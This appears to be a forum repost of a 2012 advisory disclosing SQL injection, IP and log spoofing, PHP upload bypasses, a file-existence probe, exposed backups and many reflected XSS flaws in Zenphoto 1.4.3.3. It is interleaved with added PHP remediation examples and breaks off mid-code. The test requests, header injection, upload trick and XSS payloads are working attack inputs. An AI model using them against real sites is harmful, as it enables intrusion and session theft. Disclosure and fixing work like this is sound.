Posts posted by The_Arhitect

  1. Zenphoto 1.4.3.3 Multiple Vulnerabilities

    [waraxe-2012-SA#096] - Multiple Vulnerabilities in Zenphoto 1.4.3.3
    ===============================================================================

    Author: Janek Vind "waraxe"
    Date: 03. November 2012
    Location: Estonia, Tartu
    Web: http://www.waraxe.us/advisory-96.html


    Description of vulnerable software:
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Zenphoto is a standalone CMS for multimedia focused websites. Our focus lies on
    being easy to use and having all the features there when you need them (but out
    of the way if you do not.)
    Zenphoto features support for images, video and audio formats, and the Zenpage
    CMS plugin provides a fully integrated news section (blog) and custom pages to
    run entire websites.

    http://www.zenphoto.org/

    https://code.google.com/p/zenphoto/

    Affected versions: Zenphoto 1.4.3.3 and older
    Patched version: Zenphoto 1.4.3.4


    ###############################################################################
    1. SQL Injection in "zp-core/zp-extensions/failed_access_blocker.php"
    ###############################################################################

    Reason: insufficient sanitization of user-supplied data
    Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
    Preconditions:
    1. plugin "failed_access_blocker" activated (disabled by default)

    The "failed_access_blocker" plugin logs every failed authentication attempt:

    Php script "zp-core/zp-extensions/failed_access_blocker.php" line 75:
    ------------------------[ source code start ]----------------------------------
    function failed_access_blocker_adminGate($allow, $page) {
        ...
        // add this attempt
        $sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
                ("failed_access", "'.time().'","'.getUserIP().'")';
        query($sql);
        // check how many times this has happened recently
        $count = db_count('plugin_storage','WHERE `type`="failed_access" AND
                `data`="'.getUserIP().'"');
    ------------------------[ source code end ]------------------------------------

    The user's IP address comes from the function "getUserIP()" and is used in the
    SQL query. Let's look at "getUserIP()".

    Php script "zp-core/functions.php" line 1979:
    ------------------------[ source code start ]----------------------------------
    function getUserIP() {
        if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            return sanitize($_SERVER['HTTP_X_FORWARDED_FOR'], 0);
        } else {
            return sanitize($_SERVER['REMOTE_ADDR'], 0);
        }
    }
    ------------------------[ source code end ]------------------------------------

    The function "sanitize()" does the following to the input data:
    1. strips slashes if magic_quotes_gpc=on
    2. strips null bytes
    3. strips html tags

    So we can see that "sanitize()" prevents null byte tricks and most XSS
    exploits, but it does not escape or delete single and double quotes, so SQL
    injection may still be possible. In fact, this function makes SQL injection
    more likely to occur, because it reverts the effect of "magic_quotes_gpc".
    As a result of such insufficient input sanitization, an attacker can use the
    HTTP header "X_FORWARDED_FOR" for SQL injection.

    Test:

    Let's use the Firefox browser with the Tamper Data add-on.

    1. Open admin page:

    http://localhost/zenphoto1433/zp-core/admin.php

    2. Activate Tamper Data ("Start Tamper")
    3. Try to log in with bogus credentials; Tamper Data triggers
    4. "Tamper with request?" -> "Tamper"
    5. "Add element" -> X_FORWARDED_FOR=war"axe
    6. Click "OK" and the tampered request goes to the server

    As a result we see a blank page (200 OK response code, content length 0).
    But let's look at "debug.log" in "zp-data":

    Backtrace: USER ERROR: MySql Error: ( <em>INSERT INTO `[prefix]plugin_storage`
    (`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe")</em> )
    failed. MySql returned the error <em>You have an error in your SQL syntax;
    check the manual that corresponds to your MySQL server version for the right
    syntax to use near 'axe")'


    ###############################################################################
    2. SQL Injection in "zp-core/zp-extensions/search_statistics.php"
    ###############################################################################

    Reason: insufficient sanitization of user-supplied data
    Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
    Preconditions:
    1. plugin "search_statistics" activated (disabled by default)


    Php script "zp-core/zp-extensions/search_statistics.php" line 101:
    ------------------------[ source code start ]----------------------------------
    static function handler($search_statistics, $type, $success, $dynamic,
                            $iteration) {
        ...
        $sql = 'INSERT INTO '.prefix('plugin_storage').' (`type`, `aux`,`data`) VALUES
                ("search_statistics", "'.getUserIP().'",'.db_quote(serialize($store)).')';
        query($sql);
    ------------------------[ source code end ]------------------------------------

    The user's IP address comes from the function "getUserIP()" and is used in the
    SQL query. As shown in the previous case, it is possible to use the HTTP header
    "X_FORWARDED_FOR" for SQL injection, because "getUserIP()" does not
    sufficiently sanitize user-supplied input.


    ###############################################################################
    3. IP address spoofing vulnerability via HTTP header "X_FORWARDED_FOR"
    ###############################################################################

    Reason: trusting spoofable input data
    Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
    Preconditions: none

    We saw in the two previous cases that the function "getUserIP()" can't be
    trusted, because an attacker can easily spoof his/her IP address using the
    HTTP header "X_FORWARDED_FOR". The vulnerable function "getUserIP()" is
    heavily used in the logging functionality.
    Example code lines from "zp-core/zp-extensions/security-logger.php":

    security_logger::Logger($success, $user, $name, getUserIP(), 'Back-end',
    $auth, $pass);
    security_logger::Logger($success, $user, $name, getUserIP(), 'Front-end',
    $athority, $pass);
    security_logger::Logger(false, $user, $name, getUserIP(), 'Blocked access',
    '', $page);
    security_logger::Logger(false, $user, $name, getUserIP(), 'Blocked album',
    '', $page);
    security_logger::Logger(true, $user, $name, getUserIP(), 'user_'.$class,
    'zp_admin_auth', $userobj->getUser());
    security_logger::Logger(false, $user, $name, getUserIP(), 'XSRF access blocked',
    '', $token);
    security_logger::Logger($allow, $user, $name, getUserIP(), $action,
    'zp_admin_auth', basename($log));
    security_logger::Logger($success, $user, $name, getUserIP(), 'setup_'.$action,
    'zp_admin_auth', $txt);

    So we can conclude that it is possible for an attacker to spoof the IP address
    in Zenphoto security logs. By injecting newlines ("\n") and tabs ("\t") it is
    even possible to add arbitrary fake entries to the security logs.
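As an added example that is not part of the advisory or of Zenphoto's code, here is how the IP lookup and the failed-access insert from sections 1 to 3 can be written so the header is only trusted from a known proxy and the value never reaches the SQL text. The trusted proxy list, the table name and the use of PDO with an in-memory SQLite database are assumptions made for this demonstration.

```php
<?php
// Added example, not Zenphoto code. The client address is taken from REMOTE_ADDR;
// X-Forwarded-For is honoured only when the TCP peer is one of our own reverse
// proxies, and the result is validated so it is always a syntactically valid IP.
// $trustedProxies is a constructed list for this demonstration.
function clientIp(array $server, array $trustedProxies): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return '0.0.0.0'; // never pass unvalidated input downstream
    }
    if (in_array($remote, $trustedProxies, true) && isset($server['HTTP_X_FORWARDED_FOR'])) {
        // Header format is "client, proxy1, proxy2": the left-most hop is the
        // address the first trusted proxy saw. Anything that is not an IP
        // (quotes, newlines, tabs) fails validation and we fall back to the peer.
        $hops = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        if (filter_var($hops[0], FILTER_VALIDATE_IP) !== false) {
            return $hops[0];
        }
    }
    return $remote;
}

// Log a failed login and count recent ones with prepared statements, so the
// stored value can never change the SQL. $table is a constructed table name.
function recordFailedAccess(PDO $db, string $table, string $ip): int
{
    $ins = $db->prepare("INSERT INTO {$table} (type, aux, data) VALUES ('failed_access', :ts, :ip)");
    $ins->execute([':ts' => (string) time(), ':ip' => $ip]);
    $cnt = $db->prepare("SELECT COUNT(*) FROM {$table} WHERE type = 'failed_access' AND data = :ip");
    $cnt->execute([':ip' => $ip]);
    return (int) $cnt->fetchColumn();
}

// Constructed requests: a direct client sending the advisory's payload, a client
// behind our proxy, and a forged header carrying a newline for log injection.
$trusted  = ['10.0.0.5'];
$direct   = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => 'war"axe'];
$viaProxy = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '198.51.100.9, 10.0.0.5'];
$forged   = ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => "1.2.3.4\nfake entry"];

echo clientIp($direct, $trusted), "\n";   // header ignored: peer is not a trusted proxy
echo clientIp($viaProxy, $trusted), "\n"; // left-most hop reported by the trusted proxy
echo clientIp($forged, $trusted), "\n";   // hop fails validation, peer address is used

// In-memory SQLite stands in for the MySQL table (pdo_sqlite assumed available).
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE plugin_storage (type TEXT, aux TEXT, data TEXT)');
echo recordFailedAccess($db, 'plugin_storage', 'war"axe'), "\n"; // the quote is stored as plain data
```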


    ###############################################################################
    4. File Type Restriction Bypass Vulnerability in
    "zp-core/zp-extensions/uploader_jQuery/uploader.php"
    ###############################################################################
    Preconditions:
    1. Logged in as admin with image upload privileges
    2. "uploader_jQuery" plugin activated (active by default)


    Php script "zp-core/zp-extensions/uploader_jQuery/uploader.php" line 227:
    ------------------------[ source code start ]----------------------------------
    private function handle_file_upload($uploaded_file, $name, $size, $type,
                                        $error) {
        ...
        $error = $this->has_error($uploaded_file, $file, $error);
        if (!$error && $file->name) {
            ...
            move_uploaded_file($uploaded_file, $file_path);
            if (is_valid_image($name) || is_valid_other_type($name)) {
                ...
            } else {
                $error = UPLOAD_ERR_EXTENSION; // invalid file uploaded
                break;
    ------------------------[ source code end ]------------------------------------

    As seen above, the uploaded file is first validated by the function "has_error":

    Php script "zp-core/zp-extensions/uploader_jQuery/uploader.php" line 26:
    ------------------------[ source code start ]----------------------------------
    $types = array_keys($_zp_extra_filetypes);
    $types = array_merge($_zp_supported_images, $types);
    $types = zp_apply_filter('upload_filetypes',$types);
    ...
    $options = array(
        ...
        'accept_file_types' => '/('.implode('|',$types).')$/i'
        ...
    private function has_error($uploaded_file, $file, $error) {
        ...
        if (!preg_match($this->options['accept_file_types'], $file->name)) {
            return 'acceptFileTypes';
    ------------------------[ source code end ]------------------------------------

    We can see that "preg_match()" regex validation is used for file extension
    sanitization. Example validation regex from a default installation:

    "/(gif|jpg|jpeg|png|bmp|flv|fla|3gp|mov|mp3|mp4|m4v|m4a)$/i"

    At first look it seems secure - only picture and video files are allowed to be
    uploaded. But if we analyze this regex a little more, we can spot one fatal
    flaw - it does not require a dot character before the file extension.
    As a result, it is possible to upload a file named like "info.php.123png" and
    it will pass the first validation, done by "has_error()". We can see that
    after "has_error()" the uploaded file is moved from its temporary location to
    the target album directory by the "move_uploaded_file()" function. After that,
    a second validation by the function "is_valid_image()" follows:

    Php script "zp-core/functions-basic.php" line 1173:
    ------------------------[ source code start ]----------------------------------
    function is_valid_image($filename) {
        global $_zp_supported_images;
        $ext = strtolower(substr(strrchr($filename, "."), 1));
        return in_array($ext, $_zp_supported_images);
    }
    ------------------------[ source code end ]------------------------------------

    We can see that the file extension is checked again, and this time it is a
    secure validation that can't be fooled. This situation usually means that
    exploitation is not possible, but not this time. The uploaded file has already
    been moved to the target folder, directly accessible over HTTP, and an
    important piece of PHP code is missing: the one that should delete such files.
    What the code does after a failed "is_valid_image()" is set the error flag
    "UPLOAD_ERR_EXTENSION", followed by "break". This seems to be a syntax error by
    the programmer and leads to the PHP fatal error "Cannot break/continue 1 level".
    On my local test server this means an error 500 response from the webserver,
    but still, the file is already uploaded to the target directory and stays
    there, so exploitation is possible.

    Test:

    1. Log in as admin with image upload privileges and navigate to the upload page:

    http://localhost/zenphoto1433/zp-core/admin-upload.php?page=upload&tab=albums

    Make sure that "Upload handler" is "jQuery". In this test the target album is
    "testalbum".

    2. Try to upload a PHP file containing "<?php phpinfo()?>" and named
    "info.php.123png"

    As a result we see the error message:

    "info.php.123png 0.02 KB Error: Internal Server Error"

    Still, despite the error message, the upload succeeded. The uploaded file can
    be accessed directly, resulting in PHP code execution:

    http://localhost/zenphoto1433/albums/testalbum/info.php.123png


    ###############################################################################
    5. File Type Restriction Bypass Vulnerability in
    "zp-core/admin-functions.php"
    ###############################################################################
    Preconditions:
    1. Logged in as admin with image upload privileges
    2. "zip_open()" function not available


    Php script "zp-core/admin-functions.php" line 2565:
    ------------------------[ source code start ]----------------------------------
    /**
     * Unzips an image archive
     *
     * @param file $file the archive
     * @param string $dir where the images go
     */
    function unzip($file, $dir) { //check if zziplib is installed
        if(function_exists('zip_open')) {
            $zip = zip_open($file);
            if ($zip) {
                while ($zip_entry = zip_read($zip)) { // Skip non-images in the zip file.
                    $fname = zip_entry_name($zip_entry);
                    $seoname = internalToFilesystem(seoFriendly($fname));
                    if (is_valid_image($seoname) || is_valid_other_type($seoname)) {
                        if (zip_entry_open($zip, $zip_entry, "r")) {
                            $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));
                            ...
        } else {
            require_once(dirname(__FILE__).'/lib-pclzip.php');
            $zip = new PclZip($file);
            if ($zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_REMOVE_ALL_PATH) == 0) {
    ------------------------[ source code end ]------------------------------------

    We can see that when the "zip_open()" function is available, Zenphoto reads the
    zip entries from the archive one by one and there is a check for the file type:
    only files with whitelisted extensions are extracted to the target folder.
    But when the function "zip_open()" is missing (the specific library is not
    installed), the third-party library "PclZip" is used, this time without any
    checks for file extensions. So it is possible to upload a zip archive with PHP
    files inside, and they will be extracted to the target album, allowing an
    attacker to gain PHP-level access.
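The following added example (not the advisory's or Zenphoto's code) shows the extension check that sections 4 and 5 call for: anchored on the last dot, run before the file is moved, with the file removed when a later check fails, and applied to zip entry names before any library extracts them. The whitelist and the content check via getimagesize() are assumptions for the demonstration.

```php
<?php
// Added example, not Zenphoto code: one extension check that looks at the text
// after the LAST dot, like is_valid_image(), so "info.php.123png" fails, and that
// is applied both to upload names before the move and to zip entry names before
// extraction. $allowed is a constructed whitelist.
function hasAllowedExtension(string $name, array $allowed): bool
{
    $base = basename($name);                 // ignore any directory part
    $dot  = strrpos($base, '.');
    if ($dot === false || $dot === strlen($base) - 1) {
        return false;                        // no extension, or a trailing dot
    }
    $ext = strtolower(substr($base, $dot + 1));
    return in_array($ext, $allowed, true);
}

// The advisory's pattern beside the anchored one it should have been. Even the
// anchored pattern accepts "x.php.jpg"; on Apache with mod_mime handling every
// dotted segment that can still execute, so the upload directory should also be
// configured to never run scripts.
function flawedPattern(array $allowed): string   { return '/(' . implode('|', $allowed) . ')$/i'; }
function anchoredPattern(array $allowed): string { return '/\.(' . implode('|', $allowed) . ')$/i'; }

// Ordering fix for the upload handler: reject before the file reaches a
// web-reachable directory, and remove it if a later check fails instead of
// leaving it in place as the vulnerable code does.
function storeUpload(string $tmpPath, string $name, string $albumDir, array $allowed): bool
{
    if (!hasAllowedExtension($name, $allowed)) {
        return false;                        // still in the temp location, nothing to clean up
    }
    $target = $albumDir . '/' . basename($name);
    if (!rename($tmpPath, $target)) {        // move_uploaded_file() in a real handler
        return false;
    }
    if (@getimagesize($target) === false) {  // content check: must parse as an image
        unlink($target);                     // the step missing from section 4
        return false;
    }
    return true;
}

// Section 5: filter the entry list before any library extracts it.
function filterZipEntries(array $entryNames, array $allowed): array
{
    return array_values(array_filter($entryNames, function (string $n) use ($allowed): bool {
        return hasAllowedExtension($n, $allowed);
    }));
}

$allowed = ['gif', 'jpg', 'jpeg', 'png'];
foreach (['photo.jpg', 'info.php.123png', 'shell.php', 'x.PNG', 'noext'] as $t) {
    printf("%-16s flawed=%d anchored=%d strict=%d\n", $t,
        preg_match(flawedPattern($allowed), $t),
        preg_match(anchoredPattern($allowed), $t),
        (int) hasAllowedExtension($t, $allowed));
}
print_r(filterZipEntries(['a.jpg', 'b.php', 'c.gif.php', 'dir/d.PNG'], $allowed));
```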


    ###############################################################################
    6. File Existence Disclosure in
    "zp-core/zp-extensions/uploader_flash/check.php"
    ###############################################################################
    Preconditions: none


    Php script "zp-core/zp-extensions/uploader_flash/check.php" line 26:
    ------------------------[ source code start ]----------------------------------
    $fileArray = array();
    foreach ($_POST as $key => $value) {
        if ($key != 'folder') {
            if (file_exists($_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/' . $value)) {
                $fileArray[$key] = $value;
            }
        }
    }
    echo json_encode($fileArray);
    ------------------------[ source code end ]------------------------------------

    Test:
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/zenphoto1433/zp-core/zp-extensions/uploader_flash/check.php" method="post">
    <input type="hidden" name="folder" value="">
    <input type="hidden" name="test" value="../../../../../../../../etc/passwd">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------

    Result:

    {"test":"..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}

    An attacker is able to detect file presence on the remote server, because the
    server response differs for existing and non-existent files.
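Added example, not from the advisory or Zenphoto: the same existence probe with both the folder and the file name confined to the document root by canonicalising with realpath(). The temporary directory tree is constructed for the demonstration.

```php
<?php
// Added example, not Zenphoto code: the existence probe from check.php rewritten
// so neither the "folder" nor the file name can leave the document root.
function existsWithinRoot(string $docRoot, string $folder, string $name): bool
{
    // A file name may not carry path separators or NUL bytes, nor be "." / "..".
    if ($name === '' || $name === '.' || $name === '..' || strpbrk($name, "/\\\0") !== false) {
        return false;
    }
    if (strpos($folder, "\0") !== false) {
        return false;
    }
    $root = realpath($docRoot);
    $dir  = realpath($docRoot . '/' . ltrim($folder, '/'));
    if ($root === false || $dir === false) {
        return false;
    }
    // The canonical folder must be the root itself or a descendant of it; the
    // trailing separator stops "/var/www/html2" from matching "/var/www/html".
    $rootPrefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($dir . DIRECTORY_SEPARATOR, $rootPrefix, strlen($rootPrefix)) !== 0) {
        return false;
    }
    // Same answer for missing files and for out-of-root probes, so the response
    // can only ever reveal files that are web-reachable anyway.
    return is_file($dir . DIRECTORY_SEPARATOR . $name);
}

// Constructed document root with one album image.
$docRoot = sys_get_temp_dir() . '/zp_check_' . bin2hex(random_bytes(4));
mkdir($docRoot . '/albums/testalbum', 0700, true);
touch($docRoot . '/albums/testalbum/waraxe.jpg');

$probes = [
    ['/albums/testalbum', 'waraxe.jpg'],              // legitimate in-root check
    ['/albums/testalbum', 'missing.jpg'],             // in-root, absent
    ['', '../../../../../../../../etc/passwd'],       // the advisory's payload
    ['/../../../../../../../../etc', 'passwd'],       // traversal moved into "folder"
];
foreach ($probes as [$folder, $name]) {
    printf("%-45s %s\n", $folder . '/' . $name,
        existsWithinRoot($docRoot, $folder, $name) ? 'exists' : 'no');
}

// Remove the constructed tree.
unlink($docRoot . '/albums/testalbum/waraxe.jpg');
rmdir($docRoot . '/albums/testalbum');
rmdir($docRoot . '/albums');
rmdir($docRoot);
```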


    ###############################################################################
    7. Database Backup Files Unauthorized Access Vulnerability
    ###############################################################################

    Zenphoto offers database backup functionality in the admin interface:

    Php script "zp-core/utilities/backup_restore.php" line 140:
    ------------------------[ source code start ]----------------------------------
    if (isset($_REQUEST['backup']) && db_connect()) {
        ...
        $folder = SERVERPATH . "/" . BACKUPFOLDER;
        $filename = $folder . '/backup-' . date('Y_m_d-H_i_s').'.zdb';
        if (!is_dir($folder)) {
            mkdir ($folder, FOLDER_MOD);
        }
        @chmod($folder, FOLDER_MOD);
        $handle = fopen($filename, 'w');
    ------------------------[ source code end ]------------------------------------

    We can see that database backup files are named using a simple naming scheme.
    Created backup files are directly accessible without any restrictions:

    http://localhost/zenphoto1433/backup/backup-2012_10_07-19_20_15.zdb

    As a result there may be leakage of sensitive information, like the admin's
    hashed credentials:

    s:4:"user";s:6:"waraxe";s:4:"pass";s:40:"123456789abcdef123456789abc...

    There is an "IndexIgnore *" directive in the ".htaccess" file, so by default
    directory browsing is not possible and the filename must be guessed somehow,
    but there are still vulnerable Zenphoto installations on the Internet:

    Google Dork:
    filetype:zdb inurl:backup

    Besides, there are about 60 * 60 * 24 * 365 = 31 536 000 possible filenames
    per year, so it is possible to use a brute-force method to guess the backup's
    filename.


    ###############################################################################
    8. Reflected XSS in "zp-core/zp-extensions/federated_logon/OpenID_logon.php"
    ###############################################################################

    Reason:
    1. uninitialized variables "$msg", "$error", "$success"
    2. insufficient sanitization of html output
    Attack vector:
    1. user-supplied parameters "msg", "error", "success"
    2. user-supplied GET parameter "redirect"
    Preconditions:
    1. register_globals=on (for parameters "msg", "error", "success")


    Php script "zp-core/zp-extensions/federated_logon/OpenID_logon.php" line 38:
    ------------------------[ source code start ]----------------------------------
    <?php if (isset($msg)) { print "<div class=\"alert\">$msg</div>"; } ?>
    <?php if (isset($error)) { print "<div class=\"error\">$error</div>"; } ?>
    <?php if (isset($success)) { print "<div class=\"success\">$success</div>"; } ?>
    ------------------------[ source code end ]------------------------------------

    Tests:

    http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?msg=<script>alert(123);</script>
    http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?error=<script>alert(123);</script>
    http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?success=<script>alert(123);</script>
    http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/OpenID_logon.php?redirect="+onclick=alert(123)+w="


    ###############################################################################
    9. Reflected XSS in "zp-core/zp-extensions/federated_logon/Verisign_logon.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameter "redirect"
    Preconditions: none

    Test:

    http://localhost/zenphoto1433/zp-core/zp-extensions/federated_logon/Verisign_logon.php?redirect="+onclick=alert(123)+w="


    ###############################################################################
    10. Reflected XSS in "themes/stopdesign/comment_form/comment_form.php"
    ###############################################################################

    Reason:
    1. uninitialized variable "$_zp_themeroot"
    2. insufficient sanitization of html output
    Attack vector: user-supplied parameter "_zp_themeroot"
    Preconditions: register_globals=on


    Php script "themes/stopdesign/comment_form/comment_form.php" line 5:
    ------------------------[ source code start ]----------------------------------
    global $_zp_themeroot;
    ?>
    <p class="mainbutton" id="addcommentbutton"><a href="#addcomment" class="btn">
    <img src="<?php echo $_zp_themeroot ?>
    ------------------------[ source code end ]------------------------------------

    Tests:

    http://localhost/zenphoto1433/themes/stopdesign/comment_form/comment_form.php?_zp_themeroot="><script>alert(123);</script>


    ###############################################################################
    11. Reflected XSS in "zp-core/zp-extensions/cloneZenphoto/cloneTab.php"
    ###############################################################################

    Reason:
    1. uninitialized variable "$msg"
    2. insufficient sanitization of html output
    Attack vector:
    1. user-supplied parameter "msg"
    2. user-supplied POST parameter "path"
    Preconditions:
    1. logged in as admin
    2. register_globals=on (for variable "$msg")


    The first XSS vulnerability is caused by the uninitialized variable "$msg":

    http://localhost/zenphoto1433/zp-core/zp-extensions/cloneZenphoto/cloneTab.php?success=1&msg[]=<script>alert(123);</script>

    The second XSS vulnerability relates to the POST parameter "path":

    Php script "zp-core/zp-extensions/cloneZenphoto/cloneTab.php" line 62:
    ------------------------[ source code start ]----------------------------------
    if (isset($_POST['path'])) {
    $path = sanitize($_POST['path']);
    } else {
    ...
    $downtitle = '.../'.basename($path);
    ...
    <script type="text/javascript">
    ...
    function folderChange() {
    $('#downbutton').attr('title','<?php echo $downtitle; ?>
    ------------------------[ source code end ]------------------------------------


    Test:
    -------------------------[ test code start ]-----------------------------------
    <html><body><center>
    <form action="http://localhost/zenphoto1433/zp-core/zp-extensions/cloneZenphoto/cloneTab.php" method="post">
    <input type="hidden" name="path" value="');};alert(123);function q(){var w=('">
    <input type="submit" value="Test">
    </form>
    </center></body></html>
    --------------------------[ test code end ]------------------------------------


    ###############################################################################
    12. Reflected XSS in "zp-core/admin-thumbcrop.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied parameters "subpage" and "tagsort"
    Preconditions: logged in as admin


    Php script "zp-core/admin-thumbcrop.php" line 160:
    ------------------------[ source code start ]----------------------------------
    $subpage = sanitize($_REQUEST['subpage']);
    $tagsort = sanitize($_REQUEST['tagsort']);
    ...
    <button type="reset"
    ...
    &subpage=<?php echo $subpage; ?>&tagsort=<?php echo $tagsort; ?>
    ------------------------[ source code end ]------------------------------------

    Tests (parameters "a" and "i" must be valid):

    http://localhost/zenphoto1433/zp-core/admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&subpage='"+autofocus+onFocus="alert(123);//
    http://localhost/zenphoto1433/zp-core/admin-thumbcrop.php?a=testalbum&i=waraxe.jpg&tagsort='"+autofocus+onFocus="alert(123);//


    ###############################################################################
    13. Reflected XSS in "zp-core/admin-upload.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameters "folderdisplay" and "albumtitle"
    Preconditions: logged in as admin


    Php script "zp-core/admin-upload.php" line 306:
    ------------------------[ source code start ]----------------------------------
    if (isset($_GET['folderdisplay'])) {
    ?>
    $('#folderdisplay').val('<?php echo sanitize($_GET['folderdisplay']); ?>');
    ...
    if (isset($_GET['albumtitle'])) {
    ?>
    $('#albumtitle').val('<?php echo sanitize($_GET['albumtitle']); ?>');
    ------------------------[ source code end ]------------------------------------

    Tests:

    http://localhost/zenphoto1433/zp-core/admin-upload.php?folderdisplay=');alert('xss
    http://localhost/zenphoto1433/zp-core/admin-upload.php?albumtitle=');alert('xss


    ###############################################################################
    14. Reflected XSS in "zp-core/admin-tags.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied parameter "tagsort"
    Preconditions: logged in as admin


    Php script "zp-core/admin-tags.php" line 14:
    ------------------------[ source code start ]----------------------------------
    if (isset($_REQUEST['tagsort'])) {
    $tagsort = sanitize($_REQUEST['tagsort'], 0);
    ...
    <form name="tag_delete" action="?delete=true&tagsort=<?php echo $tagsort;
    ...
    <form name="tag_rename" action="?rename=true&tagsort=<?php echo $tagsort;
    ...
    <form name="new_tags" action="?newtags=true&tagsort=<?php echo $tagsort;
    ------------------------[ source code end ]------------------------------------

    Test:

    http://localhost/zenphoto1433/zp-core/admin-tags.php?tagsort="><script>alert(123);</script>


    ###############################################################################
    15. Reflected XSS in "zp-core/admin-users.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameter "error"
    Preconditions: logged in as admin


    Php script "zp-core/admin-users.php" line 406:
    ------------------------[ source code start ]----------------------------------
    case 'format':
        echo '<h2>'.urldecode(sanitize($_GET['error'],2)).'</h2>';
    ------------------------[ source code end ]------------------------------------

    Test:

    http://localhost/zenphoto1433/zp-core/admin-users.php?page=users&mismatch=format&error=%253cscript%253ealert(123);%253c/script%253e


    ###############################################################################
    16. Reflected XSS in
    "zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/js/dialog.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameter "album"
    Preconditions: logged in as admin


    Php script "zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/js/dialog.php"
    line 50:
    ------------------------[ source code start ]----------------------------------
    var albumname = '<?php if(isset($_GET["album"]))
    { echo sanitize($_GET["album"]); } else { $_GET["album"] = ""; } ?>';
    ------------------------[ source code end ]------------------------------------

    Test:

    http://localhost/zenphoto1433/zp-core/zp-extensions/tiny_mce/plugins/tinyzenpage/tinyzenpage.php?album=';}};alert(123);var+kala={zzz+:+function(ed){var+qwe='


    ###############################################################################
    17. Reflected XSS in
    "zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php"
    ###############################################################################

    Reason:
    1. uninitialized variable "locale"
    2. insufficient sanitization of html output
    Attack vector: user-supplied parameter "locale"
    Preconditions: register_globals=on


    Php script "zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php"
    line 14:
    ------------------------[ source code start ]----------------------------------
    <script type="text/javascript">
    ...
    language: "<?php echo $locale; ?>",
    ------------------------[ source code end ]------------------------------------

    Test:

    http://localhost/zenphoto1433/zp-core/zp-extensions/tiny_mce/config/zenpage-default-full.js.php?locale=</script><script>alert(123);</script>


    ###############################################################################
    18. Reflected XSS in "zp-core/admin-comments.php"
    ###############################################################################

    Reason: insufficient sanitization of html output
    Attack vector: user-supplied GET parameter "ndeleted"
    Preconditions: logged in as admin


    Php script "zp-core/admin-comments.php" line 279:
    ------------------------[ source code start ]----------------------------------
    if ((isset($_GET['ndeleted']) && $_GET['ndeleted'] > 0) ||
    isset($_GET['sedit'])) {
    ?>
    <div class="messagebox fade-message">
    <?php
    if (isset($_GET['ndeleted'])) {
    ?>
    <h2><?php echo $_GET['ndeleted']; ?>
    ------------------------[ source code end ]------------------------------------

    Tests:

    http://localhost/zenphoto1433/zp-core/admin-comments.php?sedit=1&ndeleted=<script>alert(123);</script>
    http://localhost/zenphoto1433/zp-core/admin-comments.php?ndeleted=1<script>alert(123);</script>
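Sections 8 to 18 share one root cause, so this added example (not the advisory's or Zenphoto's code) shows output encoding chosen per context in place of sanitize(): HTML attribute, JavaScript string, numeric parameters, and the decode-then-encode order that section 15 got backwards. The helper names h() and js() are mine; the payloads are those from the tests above.

```php
<?php
// Added example, not Zenphoto code. sanitize() strips tags but leaves quotes,
// so it is no substitute for encoding at the point of output.
function h(string $s): string
{
    // HTML text and attribute values: &, <, >, " and ' all become entities.
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function js(string $s): string
{
    // JavaScript string literal, quotes included. JSON_HEX_* also escapes the
    // HTML-significant characters, so "</script>" cannot end the script block.
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        | JSON_UNESCAPED_UNICODE | JSON_INVALID_UTF8_SUBSTITUTE);
}

// Section 15: the page filtered first and urldecode()d afterwards, so a doubly
// encoded payload turned back into markup after the filter. Decode first,
// encode last, immediately before output.
function errorHeading(string $getError): string
{
    return '<h2>' . h(urldecode($getError)) . '</h2>';
}

// Section 18: a parameter that is semantically a number is handled as one.
function deletedHeading(string $getNdeleted): string
{
    $n = (int) $getNdeleted;
    return $n > 0 ? '<h2>' . $n . '</h2>' : '';
}

// Payloads from the advisory's tests, constructed here as plain strings.
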